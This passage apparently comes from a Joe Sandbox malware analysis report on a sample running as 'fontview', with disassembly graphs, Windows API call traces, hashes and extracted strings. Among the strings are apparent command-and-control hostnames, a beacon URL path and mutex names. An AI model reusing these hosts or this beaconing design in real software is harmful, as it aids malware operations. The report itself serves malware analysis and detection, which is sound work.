                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$Time__time64$FileSleepSystem__aulldiv_rand_sprintf
                                                      • String ID: /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld$Make Context:%s,time:%d,rand:%d$api.5566331.com$hjh~$754jhghj$niserr
                                                      • API String ID: 105401972-798844403
                                                      • Opcode ID: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
                                                      • Instruction ID: 49858955eb463be79c684a571caf072d61cc3a4debedbcbecd596b130e18948f
                                                      • Opcode Fuzzy Hash: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
                                                      • Instruction Fuzzy Hash: E8815D78C00249AEDB14DBA4CC91BEDB7B8EF14340F50849AE45A77156EF346B89CFA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1426 1000e4e1-1000e515 call 1000e7f8 call 1000da3f 1431 1000e51b-1000e534 call 10001d63 1426->1431 1432 1000e73c-1000e74e 1426->1432 1438 1000e536-1000e545 call 1000e4a3 1431->1438 1439 1000e548-1000e54b 1431->1439 1434 1000e755-1000e75b 1432->1434 1436 1000e773-1000e779 1434->1436 1437 1000e75d-1000e76d CreateThread 1434->1437 1440 1000e791-1000e7a2 1436->1440 1441 1000e77b-1000e78b CreateThread 1436->1441 1437->1436 1438->1439 1443 1000e551-1000e557 1439->1443 1444 1000e649-1000e67f call 1000db5e call 10015be6 call 10004766 1439->1444 1441->1440 1443->1444 1447 1000e55d-1000e578 1443->1447 1468 1000e681 1444->1468 1469 1000e6c5-1000e6e1 1444->1469 1449 1000e57a-1000e594 call 1000191f call 10001f26 1447->1449 1450 1000e59c-1000e59f 1447->1450 1449->1450 1453 1000e5a1-1000e5e1 call 1000191f call 10001f26 call 1000191f call 10001f26 call 1000c15a 1450->1453 1454 1000e5e2-1000e608 call 10002f31 call 10002d15 call 100117aa 1450->1454 1453->1454 1481 1000e60d-1000e644 call 1000191e Sleep call 10001d92 1454->1481 1474 1000e687-1000e6c0 Sleep call 1000db5e call 10015be6 call 10004766 1468->1474 1472 1000e6e3-1000e6e5 1469->1472 1473 1000e6fd-1000e70f 1469->1473 1477 1000e6e7-1000e6f6 call 10004766 1472->1477 1478 1000e711-1000e718 1473->1478 1479 1000e71b-1000e72b CreateThread 1473->1479 1501 1000e6c2 1474->1501 1495 1000e6f8-1000e6fb 1477->1495 1478->1479 1485 1000e731-1000e73a call 10001d92 1479->1485 1481->1485 1485->1434 1495->1473 1501->1469
                                                      APIs
                                                        • Part of subcall function 1000E7F8: ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000), ref: 1000E822
                                                        • Part of subcall function 1000E7F8: Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
                                                        • Part of subcall function 1000E7F8: TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
                                                        • Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
                                                        • Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D
                                                      • Sleep.KERNEL32(000003E8,?,?,?,1005ADE8,?,?,?,00000000), ref: 1000E62E
                                                        • Part of subcall function 1000DB5E: __EH_prolog.LIBCMT ref: 1000DB63
                                                        • Part of subcall function 1000DB5E: gethostbyname.WS2_32(wktcp.61611.live), ref: 1000DB78
                                                      • Sleep.KERNEL32(000003E8), ref: 1000E68C
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.1), ref: 1000DBA7
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.0), ref: 1000DBB2
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(0.0.0.0), ref: 1000DBBD
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(114.114.114.114), ref: 1000DC08
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(?), ref: 1000DC75
                                                      • CreateThread.KERNEL32(00000000,00000000,1000D124,?,00000000,00000000), ref: 1000E725
                                                      • CreateThread.KERNELBASE(00000000,00000000,1000D556,?,00000000,00000000), ref: 1000E767
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000D52D,?,00000000,00000000), ref: 1000E785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$inet_addr$CloseHandle_malloc$CreateSleepTerminate$H_prologMutexReleasegethostbyname
                                                      • String ID: Http GetSystem config is faild$[HOST] $[HOST]Today is has been running $config is faild$i$l
                                                      • API String ID: 1403256369-2250681267
                                                      • Opcode ID: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
                                                      • Instruction ID: 7789fda3e1e64cde54be39b73e63a15e1d5b9d6e7ac2d44710eacef3f7df3415
                                                      • Opcode Fuzzy Hash: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
                                                      • Instruction Fuzzy Hash: 9F71D7B5508781AFE310DF24CC84AAFBBE9EF88394F00091DF49A57295DB74AD44CB62

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1502 1001d145-1001d16e 1503 1001d371-1001d387 1502->1503 1504 1001d174-1001d195 call 10039700 1502->1504 1507 1001d354-1001d358 1504->1507 1508 1001d19a-1001d1d2 call 10039700 recvfrom 1507->1508 1509 1001d35e-1001d362 1507->1509 1513 1001d1d4-1001d1da WSAGetLastError 1508->1513 1514 1001d1df-1001d1f5 call 10039ac8 1508->1514 1509->1503 1510 1001d364-1001d36d closesocket 1509->1510 1510->1503 1513->1507 1514->1509 1517 1001d1fb-1001d238 call 10002d15 call 1000191f call 10003256 1514->1517 1524 1001d23c-1001d240 1517->1524 1525 1001d242-1001d244 1524->1525 1526 1001d25c-1001d25e 1524->1526 1527 1001d246-1001d24c 1525->1527 1528 1001d258-1001d25a 1525->1528 1529 1001d261-1001d263 1526->1529 1527->1526 1530 1001d24e-1001d256 1527->1530 1528->1529 1531 1001d285-1001d287 1529->1531 1532 1001d265-1001d269 1529->1532 1530->1524 1530->1528 1535 1001d343-1001d34f call 10001d92 1531->1535 1536 1001d28d-1001d2be call 10039700 call 1001e307 1531->1536 1533 1001d26b 1532->1533 1534 1001d26d-1001d280 call 1000191e 1532->1534 1533->1534 1534->1535 1535->1507 1544 1001d2c1-1001d2c6 1536->1544 1544->1544 1545 1001d2c8-1001d307 sendto inet_ntoa call 10001d63 1544->1545 1548 1001d320-1001d322 1545->1548 1549 1001d309-1001d30b 1545->1549 1550 1001d324-1001d333 1548->1550 1551 1001d33a-1001d33e call 10001d92 1548->1551 1549->1551 1552 1001d30d-1001d31e 1549->1552 1553 1001d335 call 10006376 1550->1553 1551->1535 1552->1553 1553->1551
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001D1C7
                                                      • WSAGetLastError.WS2_32 ref: 1001D1D4
                                                      • closesocket.WS2_32(000000FF), ref: 1001D367
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastclosesocketrecvfrom
                                                      • String ID: bck$cc1
                                                      • API String ID: 3381545151-2601045076
                                                      • Opcode ID: 129aae17363f5c89898e632d42c80201e10783f1f3fa59a68ecd7131db66c8c6
                                                      • Instruction ID: 74b77c914f8fb08b1b481ee05821763d154c8954b077fc1ebe75881fb8d60909
                                                      • Opcode Fuzzy Hash: 129aae17363f5c89898e632d42c80201e10783f1f3fa59a68ecd7131db66c8c6
                                                      • Instruction Fuzzy Hash: 5C51D372508341AFE710EF60CC81BABB7E8EF45354F404A1EFAA587191D771EA48CB52
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000D5A8
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1000D691
                                                        • Part of subcall function 1003245C: std::exception::exception.LIBCMT ref: 10032472
                                                        • Part of subcall function 1003245C: __CxxThrowException@8.LIBCMT ref: 10032487
                                                      • _sprintf.LIBCMT ref: 1000D764
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,00000000,000000FF,?,?,?,?,10065258,00000000,0000000F,00000000), ref: 1000D7CC
                                                      • __time64.LIBCMT ref: 1000D809
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_CreateException@8H_prologInternal_throw_exceptionMutexThrow__time64_malloc_sprintfstd::exception::exception
                                                      • String ID: %s%s$ami.sh74lmy.com$jkdi%42&!#123
                                                      • API String ID: 3941556643-366288768
                                                      • Opcode ID: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
                                                      • Instruction ID: 694c5179693b881f44d76fd1f052d4137bf0354451c1df981b2dbb7ff4a16f9c
                                                      • Opcode Fuzzy Hash: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
                                                      • Instruction Fuzzy Hash: 1381F1B4801B459ED721CFBAC4917DAFBE4FF19300F90896ED1AE97242DB706644CB61
                                                      APIs
                                                      • ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
                                                      • CloseHandle.KERNEL32(00000000), ref: 1000E822
                                                      • Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
                                                      • TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
                                                      • CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
                                                      • TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
                                                      • CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
                                                      • TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
                                                      • CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$TerminateThread$MutexReleaseSleep
                                                      • String ID:
                                                      • API String ID: 1937260624-0
                                                      • Opcode ID: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
                                                      • Instruction ID: 37b1b03ea3f2de3eb637aef0c1f15a50e86a627c4c476671b1db0ab1197ea950
                                                      • Opcode Fuzzy Hash: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
                                                      • Instruction Fuzzy Hash: 3B11D631600B44ABF760DB35CC84BEBB7E8EF48795F114829E1AEA61A0DB74AC448B54
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: request: %s%s$Error (%s) in line: %d in file: %s$_requestBuffer.length() > 0$inc\http\HttpConnection.cpp$sendHeaders()
                                                      • API String ID: 2738768116-1894206355
                                                      • Opcode ID: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
                                                      • Instruction ID: 0e289029b42b07f0cd472e7fd920a7862120a76635c283eded3de750890f031e
                                                      • Opcode Fuzzy Hash: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
                                                      • Instruction Fuzzy Hash: BC01F530201254AAF330EA24AC1AEA736B5FF92601F44081FF5464F183D771EA8A8372
                                                      APIs
                                                      • _wprintf.LIBCMT ref: 1001A334
                                                      • send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
                                                      • WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B
                                                      Strings
                                                      • inc\http\Socket.cpp, xrefs: 1001A323
                                                      • data.length() > 0, xrefs: 1001A32A
                                                      • Error (%s) in line: %d in file: %s, xrefs: 1001A32F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wprintfsend
                                                      • String ID: Error (%s) in line: %d in file: %s$data.length() > 0$inc\http\Socket.cpp
                                                      • API String ID: 2875704336-3018366312
                                                      • Opcode ID: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
                                                      • Instruction ID: a370ff211135ef3551e3cbd0d85bcf54042522b8ec64c26ef99c261646a77a4d
                                                      • Opcode Fuzzy Hash: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
                                                      • Instruction Fuzzy Hash: 0EF0B432500620BBE720AA64DC04B86F7A4FB01671F004627FA249B691C370BE8587E1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintfgethostbynameinet_addr
                                                      • String ID: Error (%s) in line: %d in file: %s$address != NULL$inc\http\Socket.cpp
                                                      • API String ID: 2322658221-3467638553
                                                      • Opcode ID: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
                                                      • Instruction ID: 4b9a3f45cc822d481f5f270d039c0712fd041b9735d2b0daff9342695111d3cf
                                                      • Opcode Fuzzy Hash: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
                                                      • Instruction Fuzzy Hash: 08E092316109307BDB11EB2CAC44AC933D4EB06232F418143F404DB1A2D774EDC24AD5
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100117AF
                                                      • Sleep.KERNELBASE(00002710,?,?,00000000,000000FF,1005AF8C,00000000,10006588,?,00000000), ref: 10011861
                                                      • ReleaseMutex.KERNEL32 ref: 10011873
                                                      • CloseHandle.KERNELBASE ref: 10011881
                                                      • ReleaseMutex.KERNEL32 ref: 10011890
                                                      • CloseHandle.KERNEL32 ref: 10011898
                                                        • Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7
                                                        • Part of subcall function 100154F5: __EH_prolog.LIBCMT ref: 100154FA
                                                        • Part of subcall function 100154F5: _sprintf.LIBCMT ref: 10015565
                                                        • Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
                                                        • Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
                                                        • Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
                                                        • Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
                                                        • Part of subcall function 100154F5: CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseErrorH_prologHandleLastOpenRelease$CreateSleep_memmove_sprintf
                                                      • String ID:
                                                      • API String ID: 4039639769-0
                                                      • Opcode ID: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
                                                      • Instruction ID: 3068f5a1bf16b1bd64fdc3553b6d17508d20df758c6a95adc449cb463f1d6c97
                                                      • Opcode Fuzzy Hash: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
                                                      • Instruction Fuzzy Hash: 8F31C075900124AFEB14DF64CC96BED77B5EF44360F10826AF806AB1A2DF74AE85CB50
                                                      APIs
                                                        • Part of subcall function 10005BE6: WSAStartup.WS2_32(00000202,?), ref: 10005C19
                                                      • Sleep.KERNELBASE(0000000A), ref: 1001A92E
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 1001A94E
                                                      • CloseHandle.KERNEL32 ref: 1001A960
                                                      • ReleaseMutex.KERNEL32 ref: 1001A968
                                                      • CloseHandle.KERNEL32 ref: 1001A974
                                                      • Sleep.KERNELBASE(000001F4), ref: 1001A989
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleMutexReleaseSleep$Startup
                                                      • String ID:
                                                      • API String ID: 3889887703-0
                                                      • Opcode ID: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
                                                      • Instruction ID: 77a9dc64d7ec4658a88107c2dfb50ea3d3ee354ef9d95e056dd7178ddb840d27
                                                      • Opcode Fuzzy Hash: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
                                                      • Instruction Fuzzy Hash: 36F03CB1510230AFFB41DF75DC8D75A3BA2FB1935AF024215F085961B2C7F85980CB5A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: $Error (%s) in line: %d in file: %s$inc\http\HttpConnection.cpp$pDataOut != NULL
                                                      • API String ID: 2738768116-4064496196
                                                      • Opcode ID: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
                                                      • Instruction ID: b3279fd1f64e757fc39bef5126cbef0cf3ed16947356f535cad2a22282ac5a8b
                                                      • Opcode Fuzzy Hash: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
                                                      • Instruction Fuzzy Hash: 620108351006057AE331EA64CC41FD777B8EB20260F04095FF646961D3DB61FAC983A2
                                                      APIs
                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
                                                      • GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A
                                                      • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00100000,?,?,1001A9D0), ref: 1001B9AD
                                                      • CloseHandle.KERNEL32(?,?,1001A9D0), ref: 1001B9C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
